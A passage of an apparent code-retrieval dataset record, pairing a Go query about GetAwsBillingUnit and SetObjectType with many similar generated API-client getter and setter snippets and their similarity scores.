GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *KubernetesNodeGroupProfile) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *ApplianceClusterInstallPhase) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}", "func (o *SearchTagItem) GetObjectTypeOk() (*string, bool) {\n\tif o == nil {\n\t\treturn nil, false\n\t}\n\treturn &o.ObjectType, true\n}" ]
[ "0.82690305", "0.8235275", "0.8225459", "0.82178885", "0.8205053", "0.8191001", "0.81845963", "0.81790584", "0.81777114", "0.81682307", "0.8162556", "0.8146372", "0.81442434", "0.81431884", "0.81346446", "0.8124548", "0.81165004", "0.8111578", "0.8101773", "0.80959475", "0.80935526", "0.8085859", "0.80847853", "0.8077745", "0.8074482", "0.8073783", "0.80721205", "0.8069282", "0.80477333", "0.8047429", "0.8036537", "0.8032265", "0.8027987", "0.80276257", "0.80257565", "0.80244976", "0.801845", "0.80178654", "0.80178094", "0.80149263", "0.80120265", "0.8006893", "0.80038416", "0.80032897", "0.8002591", "0.7999577", "0.7999084", "0.7994034", "0.7977803", "0.79767627", "0.7973987", "0.7972588", "0.79724354", "0.79715306", "0.7970488", "0.797004", "0.79666287", "0.7961179", "0.79572326", "0.79513144", "0.794909", "0.7948782", "0.79404634", "0.7938052", "0.79346085", "0.7928416", "0.79256344", "0.79252476", "0.7918447", "0.7912032", "0.7910765", "0.79091936", "0.79064", "0.7904951", "0.7904594", "0.79015476", "0.79014724", "0.7898421", "0.7889074", "0.78889686", "0.78875494", "0.78791076", "0.7873027", "0.787128", "0.7870544", "0.78616935", "0.78506434", "0.784911", "0.78450024", "0.78375226", "0.7836347", "0.78360254", "0.7834192", "0.7832145", "0.7826267", "0.7821559", "0.7818989", "0.78131366", "0.7802407", "0.7799117" ]
0.7930751
65
SetObjectType sets field value
func (o *CloudAwsVirtualMachineAllOf) SetObjectType(v string) { o.ObjectType = v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *FirmwareHttpServer) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *VirtualizationIweHost) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageSasExpander) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *MemoryArrayAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *SdwanRouterNode) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *ForecastModelAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *VirtualizationIweClusterAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexReplicationPlatDatastore) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *WorkflowCatalogServiceRequest) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HclFirmware) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetryNexusDashboardsAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetryNveVni) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *IppoolPoolMember) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *InventoryBase) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageRemoteKeySetting) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *VirtualizationIweVirtualMachine) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexEncryption) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetryNicc) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetryDigitalOpticalMonitoring) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *ComputeBladeIdentityAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageSpaceAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *SoftwarerepositoryLocalMachineAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageHitachiVolumeMigrationPair) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageEnclosure) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *MacpoolLeaseAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NetworkDns) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *ServerConfigImportAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (m *AuditLogMutation) SetObjectType(s string) {\n\tm.object_type = &s\n}", "func (o *IamLdapProviderAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexMapClusterIdToProtectionInfoAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *WorkflowSshCmd) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *FeedbackFeedbackPost) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetryMsoTenantDetailsAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageBaseCapacity) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EquipmentFanModule) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EquipmentLocatorLed) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *RackUnitPersonality) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *ApplianceSetupInfoAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiaapiRevisionInfoAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StoragePhysicalDisk) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *CloudInstanceTypeAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *KubernetesEthernetMatcher) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EquipmentBaseSensor) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageHitachiPortAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *WorkflowCliCommandAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *BulkResult) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *SoftwarerepositoryCategoryMapper) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StoragePhysicalDiskAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *InventoryBaseAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (obj *SObject) setType(typeName string) {\n\tattributes := obj.InterfaceField(sobjectAttributesKey)\n\tswitch attributes.(type) {\n\tcase SObjectAttributes:\n\t\tattrs := obj.AttributesField()\n\t\tattrs.Type = typeName\n\t\t(*obj)[sobjectAttributesKey] = *attrs\n\tdefault:\n\t\t(*obj)[sobjectAttributesKey] = SObjectAttributes{\n\t\t\tType: typeName,\n\t\t}\n\t}\n}", "func (o *HyperflexHxapDvUplink) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EtherHostPort) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexSnapshotStatus) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *MacpoolPoolMemberAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *IaasMostRunTasksAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *FcNeighborAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *VirtualizationVmwareVirtualMachineAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetrySwitchDiskUtilization) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EquipmentIoCardBase) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageNetAppCloudTargetAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexServerFirmwareVersionEntryAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageFlexUtilVirtualDrive) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *WorkflowBuildTaskMeta) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *KubernetesAddonDefinitionAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageVdMemberEpAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *OpenapiTaskGenerationResult) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StoragePhysicalDiskExtension) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexSoftwareVersionPolicy) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *VnicEthAdapterPolicyInventory) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageHitachiParityGroupAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiatelemetryEqptcapacityPolUsage5minAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *OpenapiProcessFileAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageFlexFlashVirtualDrive) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NetworkLicenseFile) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *KvmPolicyInventory) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexVmSnapshotInfoAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *NiaapiNewReleaseDetailAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *OnpremUpgradePhase) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageHyperFlexStorageContainer) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *IamServiceProviderAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EtherPhysicalPort) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *ApplianceClusterInstallPhase) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *OsInstallAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *WorkflowServiceItemDefinitionAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *DeleteSystemObjectDefinitionsByIDAttributeGroupsByIDAttributeDefinitionsByIDParams) SetObjectType(objectType string) {\n\to.ObjectType = objectType\n}", "func (o *StorageNetAppHighAvailability) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *OnpremUpgradeNoteAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *ApplianceGroupOpStatus) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *IamLdapConfigParamsAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageNetAppSnapshotPolicySchedule) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EquipmentIdentityAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *WorkflowWorkflowDefinitionAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *MemoryPersistentMemoryNamespaceConfigResult) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *StorageExternalParityGroupAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *AssetNewRelicCredential) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *IamIpAddress) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *EquipmentFanControl) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *HyperflexClusterHealthCheckExecutionSnapshot) SetObjectType(v string) {\n\to.ObjectType = v\n}", "func (o *TechsupportmanagementEndPointAllOf) SetObjectType(v string) {\n\to.ObjectType = v\n}" ]
[ "0.72598195", "0.71147555", "0.71124655", "0.7066612", "0.70453095", "0.70164937", "0.7003659", "0.6998718", "0.6988382", "0.6984255", "0.6980629", "0.69601154", "0.69447726", "0.6934236", "0.69300306", "0.6916428", "0.6909329", "0.6905152", "0.6901688", "0.69000477", "0.6891027", "0.68869746", "0.6885021", "0.688028", "0.68800944", "0.6879807", "0.687472", "0.6864289", "0.6851787", "0.6840665", "0.6833256", "0.6831023", "0.6828792", "0.6827713", "0.68088526", "0.6802101", "0.6792383", "0.6791878", "0.6783206", "0.6781103", "0.6780378", "0.6775748", "0.6775742", "0.677485", "0.6772801", "0.67694736", "0.6751254", "0.67449737", "0.6738903", "0.67372394", "0.67351294", "0.6735021", "0.6724778", "0.67225844", "0.6722299", "0.6713263", "0.6703336", "0.6700527", "0.66943324", "0.66934323", "0.6693185", "0.668871", "0.66861004", "0.66856134", "0.66821915", "0.66762626", "0.667015", "0.66647696", "0.6661627", "0.6660089", "0.6659421", "0.66583025", "0.66581947", "0.6657698", "0.6657553", "0.66527903", "0.6649215", "0.6638429", "0.6634246", "0.66318506", "0.66282165", "0.6625352", "0.66224235", "0.66176844", "0.661547", "0.66095644", "0.66048276", "0.6604041", "0.66037744", "0.6600909", "0.65996975", "0.6599362", "0.6596733", "0.6595855", "0.6594267", "0.6594211", "0.65935296", "0.65927446", "0.6591226", "0.65899247" ]
0.6683986
64
GetAwsBillingUnit returns the AwsBillingUnit field value if set, zero value otherwise.
func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnit() CloudAwsBillingUnitRelationship { if o == nil || o.AwsBillingUnit == nil { var ret CloudAwsBillingUnitRelationship return ret } return *o.AwsBillingUnit }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CloudAwsVirtualMachineAllOf) SetAwsBillingUnit(v CloudAwsBillingUnitRelationship) {\n\to.AwsBillingUnit = &v\n}", "func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnitOk() (*CloudAwsBillingUnitRelationship, bool) {\n\tif o == nil || o.AwsBillingUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AwsBillingUnit, true\n}", "func (o *CloudAwsVirtualMachineAllOf) HasAwsBillingUnit() bool {\n\tif o != nil && o.AwsBillingUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (c *bytemarkClient) GetBillingEndpoint() string {\n\treturn c.urls.Billing\n}", "func (m NoSides) GetBookingUnit() (v enum.BookingUnit, err quickfix.MessageRejectError) {\n\tvar f field.BookingUnitField\n\tif err = m.Get(&f); err == nil {\n\t\tv = f.Value()\n\t}\n\treturn\n}", "func (o *DataExportQuery) GetUnit() string {\n\tif o == nil || o.Unit == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Unit\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) GetUnit() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.Unit\n}", "func (o *Organization) GetBillingEmail() string {\n\tif o == nil || o.BillingEmail == nil {\n\t\treturn \"\"\n\t}\n\treturn *o.BillingEmail\n}", "func (o ElastigroupScalingUpPolicyOutput) Unit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ElastigroupScalingUpPolicy) *string { return v.Unit }).(pulumi.StringPtrOutput)\n}", "func GetEstimatedBilling(sess *session.Session, startTime, endTime time.Time) (latest float64, average float64) {\n\tsvc := cloudwatch.New(sess)\n\n\t// fmt.Println(\"Start time: \", startTime)\n\t// fmt.Println(\"End time: \", endTime)\n\n\tparams := &cloudwatch.GetMetricStatisticsInput{\n\t\tNamespace: aws.String(\"AWS/Billing\"),\n\t\tStartTime: aws.Time(startTime),\n\t\tEndTime: aws.Time(endTime),\n\t\tMetricName: aws.String(\"EstimatedCharges\"),\n\t\tPeriod: aws.Int64(86400),\n\t\tStatistics: []*string{\n\t\t\taws.String(\"Maximum\"),\n\t\t},\n\t\tDimensions: []*cloudwatch.Dimension{\n\t\t\t{\n\t\t\t\tName: aws.String(\"Currency\"),\n\t\t\t\tValue: aws.String(\"USD\"),\n\t\t\t},\n\t\t},\n\t}\n\n\tresp, err := svc.GetMetricStatistics(params)\n\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn 0, 0\n\t}\n\n\tjsonBody, _ := json.Marshal(resp)\n\n\tvar result result\n\tjson.Unmarshal(jsonBody, &result)\n\tsort.Sort(result.Datapoints)\n\n\t// fmt.Println(\"Billing Datapoints:\", result.Datapoints)\n\n\tif len(result.Datapoints) > 0 {\n\t\tlatest = result.Datapoints[0].Maximum\n\t\tlength := len(result.Datapoints)\n\t\taverage = result.Datapoints[0].Maximum / float64(length)\n\t}\n\treturn\n}", "func (m *MarketplacePlan) GetUnitName() string {\n\tif m == nil || m.UnitName == nil {\n\t\treturn \"\"\n\t}\n\treturn *m.UnitName\n}", "func (_options *ImportAccountToEnterpriseOptions) SetBillingUnitID(billingUnitID string) *ImportAccountToEnterpriseOptions {\n\t_options.BillingUnitID = core.StringPtr(billingUnitID)\n\treturn _options\n}", "func getAwsRegion() (region string) {\n\tregion, _ = getAwsRegionE()\n\treturn\n}", "func (o ClusterNodeGroupSubscriptionConfigOutput) PaymentDurationUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeGroupSubscriptionConfig) string { return v.PaymentDurationUnit }).(pulumi.StringOutput)\n}", "func (o ClusterSubscriptionConfigOutput) PaymentDurationUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterSubscriptionConfig) string { return v.PaymentDurationUnit }).(pulumi.StringOutput)\n}", "func (m *MarketplacePurchase) GetUnitCount() int {\n\tif m == nil || m.UnitCount == nil {\n\t\treturn 0\n\t}\n\treturn *m.UnitCount\n}", "func (o *EnvironmentUsageDto) GetSyntheticBillingUsage() []SyntheticBillingUsageDto {\n\tif o == nil || o.SyntheticBillingUsage == nil {\n\t\tvar ret []SyntheticBillingUsageDto\n\t\treturn ret\n\t}\n\treturn *o.SyntheticBillingUsage\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) SetUnit(v string) {\n\to.Unit = v\n}", "func (o MrScalarCoreScalingUpPolicyOutput) Unit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MrScalarCoreScalingUpPolicy) string { return v.Unit }).(pulumi.StringOutput)\n}", "func (o *AdminInfo) GetBusinessUnit() BusinessUnit {\n\tif o == nil || o.BusinessUnit == nil {\n\t\tvar ret BusinessUnit\n\t\treturn ret\n\t}\n\treturn *o.BusinessUnit\n}", "func getAWSRegion(s3Bucket string, config *aws.Config, settings map[string]string) (string, error) {\n\tif region, ok := settings[RegionSetting]; ok {\n\t\treturn region, nil\n\t}\n\tif config.Endpoint == nil ||\n\t\t*config.Endpoint == \"\" ||\n\t\tstrings.HasSuffix(*config.Endpoint, \".amazonaws.com\") {\n\t\tregion, err := findBucketRegion(s3Bucket, config)\n\t\treturn region, errors.Wrapf(err, \"%s is not set and s3:GetBucketLocation failed\", RegionSetting)\n\t} else {\n\t\t// For S3 compatible services like Minio, Ceph etc. use `us-east-1` as region\n\t\t// ref: https://github.com/minio/cookbook/blob/master/docs/aws-sdk-for-go-with-minio.md\n\t\treturn \"us-east-1\", nil\n\t}\n}", "func (o MrScalarTaskScalingUpPolicyOutput) Unit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MrScalarTaskScalingUpPolicy) string { return v.Unit }).(pulumi.StringOutput)\n}", "func (o *ReservationModel) GetUnit() EmbeddedUnitModel {\n\tif o == nil || o.Unit == nil {\n\t\tvar ret EmbeddedUnitModel\n\t\treturn ret\n\t}\n\treturn *o.Unit\n}", "func (o *EnvironmentUsageDto) GetSyntheticBillingUsageOk() (*[]SyntheticBillingUsageDto, bool) {\n\tif o == nil || o.SyntheticBillingUsage == nil {\n\t\treturn nil, false\n\t}\n\treturn o.SyntheticBillingUsage, true\n}", "func GetUnit(muID int) *ExprUnit {\n\tunitsLock.RLock()\n\tdefer unitsLock.RUnlock()\n\treturn units[muID]\n}", "func (o ClusterNodeGroupSubscriptionConfigPtrOutput) PaymentDurationUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *ClusterNodeGroupSubscriptionConfig) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.PaymentDurationUnit\n\t}).(pulumi.StringPtrOutput)\n}", "func (o ElastigroupScalingDownPolicyOutput) Unit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ElastigroupScalingDownPolicy) *string { return v.Unit }).(pulumi.StringPtrOutput)\n}", "func (o *InlineResponse20075Stats) GetBilling() InlineResponse20075StatsBilling {\n\tif o == nil || o.Billing == nil {\n\t\tvar ret InlineResponse20075StatsBilling\n\t\treturn ret\n\t}\n\treturn *o.Billing\n}", "func (o *GetMetricsParams) SetBillingRegions(billingRegions *string) {\n\to.BillingRegions = billingRegions\n}", "func (o *InlineResponse20075Stats) HasBilling() bool {\n\tif o != nil && o.Billing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (r *PrivateVirtualInterface) AwsDevice() pulumi.StringOutput {\n\treturn (pulumi.StringOutput)(r.s.State[\"awsDevice\"])\n}", "func (o *Ga4ghChemotherapy) GetDoseUnit() string {\n\tif o == nil || o.DoseUnit == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.DoseUnit\n}", "func (o ClusterSubscriptionConfigPtrOutput) PaymentDurationUnit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *ClusterSubscriptionConfig) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn &v.PaymentDurationUnit\n\t}).(pulumi.StringPtrOutput)\n}", "func (o MrScalarTaskScalingDownPolicyOutput) Unit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MrScalarTaskScalingDownPolicy) string { return v.Unit }).(pulumi.StringOutput)\n}", "func (o LookupOrganizationResultOutput) BillingType() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupOrganizationResult) string { return v.BillingType }).(pulumi.StringOutput)\n}", "func (o MrScalarCoreScalingDownPolicyOutput) Unit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MrScalarCoreScalingDownPolicy) string { return v.Unit }).(pulumi.StringOutput)\n}", "func (o *GetMetricsParams) WithBillingRegions(billingRegions *string) *GetMetricsParams {\n\to.SetBillingRegions(billingRegions)\n\treturn o\n}", "func (o ElastigroupScalingTargetPolicyOutput) Unit() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ElastigroupScalingTargetPolicy) *string { return v.Unit }).(pulumi.StringPtrOutput)\n}", "func (o *InlineResponse20075Stats) GetBillingOk() (*InlineResponse20075StatsBilling, bool) {\n\tif o == nil || o.Billing == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Billing, true\n}", "func (o *ViewProjectActivePages) GetBilling() bool {\n\tif o == nil || o.Billing == nil {\n\t\tvar ret bool\n\t\treturn ret\n\t}\n\treturn *o.Billing\n}", "func (c *Client) GetBillingID() string {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\treturn c.billingID\n}", "func (o VoiceConnectorOutput) AwsRegion() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *VoiceConnector) pulumi.StringPtrOutput { return v.AwsRegion }).(pulumi.StringPtrOutput)\n}", "func (u *Unit) GetUnitStatus(w http.ResponseWriter) error {\n\tconn, err := sd.NewSystemdConnection()\n\tif err != nil {\n\t\tlog.Errorf(\"Failed to get systemd bus connection: %v\", err)\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\n\tunits, err := conn.ListUnitsByNames([]string{u.Unit})\n\tif err != nil {\n\t\tlog.Errorf(\"Failed get unit '%s' status: %v\", u.Unit, err)\n\t\treturn err\n\t}\n\n\tstatus := UnitStatus{\n\t\tStatus: units[0].ActiveState,\n\t\tUnit: u.Unit,\n\t}\n\n\tjson.NewEncoder(w).Encode(status)\n\n\treturn nil\n}", "func (o *AdminInfo) GetBusinessUnitOk() (*BusinessUnit, bool) {\n\tif o == nil || o.BusinessUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.BusinessUnit, true\n}", "func (s *HistoricalMetric) SetUnit(v string) *HistoricalMetric {\n\ts.Unit = &v\n\treturn s\n}", "func getAwsAccount(r *http.Request, a routes.Arguments) (int, interface{}) {\n\tu := a[users.AuthenticatedUser].(users.User)\n\ttx := a[db.Transaction].(*sql.Tx)\n\tl := jsonlog.LoggerFromContextOrDefault(r.Context())\n\tawsAccounts, err := GetAwsAccountsFromUser(u, tx)\n\tif err == nil {\n\t\treturn 200, awsAccounts\n\t} else {\n\t\tl.Error(\"Failed to get user's AWS accounts.\", err.Error())\n\t\treturn 500, errors.New(\"Failed to retrieve AWS accounts.\")\n\t}\n}", "func (o *DataExportQuery) SetUnit(v string) {\n\to.Unit = &v\n}", "func (s OrganizationalUnit) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (r Virtual_Guest) GetCurrentBillingTotal() (resp datatypes.Float64, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Virtual_Guest\", \"getCurrentBillingTotal\", nil, &r.Options, &resp)\n\treturn\n}", "func (o *AUMEvoluation) GetBalance() float64 {\n\tif o == nil {\n\t\tvar ret float64\n\t\treturn ret\n\t}\n\n\treturn o.Balance\n}", "func (cnst boltzmannUnits) Unit() *unit.Unit {\n\treturn unit.New(float64(cnst), unit.Dimensions{\n\t\tunit.MassDim: 1,\n\t\tunit.LengthDim: 2,\n\t\tunit.TimeDim: -2,\n\t\tunit.TemperatureDim: -1,\n\t})\n}", "func (o *ReservationModel) GetUnitGroup() EmbeddedUnitGroupModel {\n\tif o == nil {\n\t\tvar ret EmbeddedUnitGroupModel\n\t\treturn ret\n\t}\n\n\treturn o.UnitGroup\n}", "func (r Virtual_Storage_Repository) GetBillingItem() (resp datatypes.Billing_Item, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Virtual_Storage_Repository\", \"getBillingItem\", nil, &r.Options, &resp)\n\treturn\n}", "func (a *BackoffTimerValue) GetUnitTimerValue() (unitTimerValue uint8) {}", "func (o TopicRuleCloudwatchMetricOutput) MetricUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v TopicRuleCloudwatchMetric) string { return v.MetricUnit }).(pulumi.StringOutput)\n}", "func (o *ReservationModel) HasUnit() bool {\n\tif o != nil && o.Unit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *CurrentMetric) SetUnit(v string) *CurrentMetric {\n\ts.Unit = &v\n\treturn s\n}", "func (r Virtual_ReservedCapacityGroup_Instance) GetBillingItem() (resp datatypes.Billing_Item, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Virtual_ReservedCapacityGroup_Instance\", \"getBillingItem\", nil, &r.Options, &resp)\n\treturn\n}", "func (m NoSides) SetBookingUnit(v enum.BookingUnit) {\n\tm.Set(field.NewBookingUnit(v))\n}", "func (o *ReservationModel) GetUnitOk() (*EmbeddedUnitModel, bool) {\n\tif o == nil || o.Unit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Unit, true\n}", "func (s *Spend) SetUnit(v string) *Spend {\n\ts.Unit = &v\n\treturn s\n}", "func (o *TransactionSplit) GetBunqPaymentId() string {\n\tif o == nil || o.BunqPaymentId.Get() == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.BunqPaymentId.Get()\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) GetBillingAccountId() string {\n\tif o == nil || o.BillingAccountId == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.BillingAccountId\n}", "func (o *ViewProjectActivePages) GetBillingOk() (*bool, bool) {\n\tif o == nil || o.Billing == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Billing, true\n}", "func (o StorageCapacityUnitOutput) PeriodUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *StorageCapacityUnit) pulumi.StringOutput { return v.PeriodUnit }).(pulumi.StringOutput)\n}", "func (o *DataExportQuery) GetUnitReference() int32 {\n\tif o == nil || o.UnitReference == nil {\n\t\tvar ret int32\n\t\treturn ret\n\t}\n\treturn *o.UnitReference\n}", "func (o *InlineResponse20075Stats) SetBilling(v InlineResponse20075StatsBilling) {\n\to.Billing = &v\n}", "func (o *DataExportQuery) GetUnitOk() (*string, bool) {\n\tif o == nil || o.Unit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Unit, true\n}", "func (tuo *TimingUpdateOne) SetUnit(s string) *TimingUpdateOne {\n\ttuo.mutation.SetUnit(s)\n\treturn tuo\n}", "func (tu *TimingUpdate) SetUnit(s string) *TimingUpdate {\n\ttu.mutation.SetUnit(s)\n\treturn tu\n}", "func (m *BillingstatusMutation) ResetBillingstatuss() {\n\tm.billingstatuss = nil\n\tm.removedbillingstatuss = nil\n}", "func (o *EnvironmentUsageDto) HasSyntheticBillingUsage() bool {\n\tif o != nil && o.SyntheticBillingUsage != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func initAwsClient() aws.Client {\n\treturn aws.NewClient(\"elastisys-billing-data\")\n}", "func (o *ReservationModel) SetUnit(v EmbeddedUnitModel) {\n\to.Unit = &v\n}", "func getAwsRegionE() (region string, err error) {\n\n\tif os.Getenv(\"AWS_DEFAULT_REGION\") != \"\" {\n\t\tregion = os.Getenv(\"AWS_DEFAULT_REGION\")\n\t} else {\n\t\t// Grab it from this EC2 instace\n\t\tregion, err = ec2metadata.New(session.New()).Region()\n\t}\n\treturn\n}", "func NewAwsDetails() AwsDetails {\n\tdetails := AwsDetails{\n\t\tRegion: os.Getenv(`REGION`),\n\t\tTokenParameter: os.Getenv(`TOKEN_PARAMETER`),\n\t\tTimeParameter: 